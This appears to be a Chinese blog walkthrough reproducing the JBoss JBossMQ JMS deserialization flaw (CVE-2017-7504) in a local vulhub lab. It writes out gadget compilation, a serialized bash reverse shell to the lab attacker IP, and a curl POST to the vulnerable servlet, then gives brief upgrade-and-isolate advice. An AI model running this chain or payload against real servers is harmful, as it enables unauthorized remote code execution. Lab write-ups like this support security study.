JBoss 4.x JBossMQ JMS反序列化(CVE-2017-7504)

一、漏洞介紹

1.1 漏洞簡介

  JBoss是一個基於J2EE的開放源代碼應用服務器,用戶佔有量較大,JBoss實現過程的JMS over HTTP Invocation Layer的HttpServerILServlet.java文件存在反序列化漏洞。

1.2 影響版本

  • JBoss<4.x

1.3 利用路徑

/jbossmq-httpil/HTTPServerILServlet
在這裏插入圖片描述

1.4 全球統計

在這裏插入圖片描述

二、環境搭建

  • 受害者IP:192.168.159.129(vulhub)
  • 攻擊者IP:192.168.159.128(kali)

》》啓動Jbos AS 4.0.5
在這裏插入圖片描述》》訪問web站點
在這裏插入圖片描述

三、操作過程

》》使用JavaDeserH2HC工具
》》使用Gadget:ExampleCommonsCollections1WithHashMap編譯生成序列化數據

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

在這裏插入圖片描述
》》序列化惡意數據到文件(bash反彈shell)

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.159.128/19111 0>&1" 

在這裏插入圖片描述
》》nc開啓shell監聽
在這裏插入圖片描述
》》以二進制的方式POST發送數據到目標站點

curl http://192.168.159.129:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

在這裏插入圖片描述
》》成功收到shell
在這裏插入圖片描述

四、防禦措施

  1. 將JBoss版本升級到最新
  2. 儘量不要將JBoss映射到公網
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章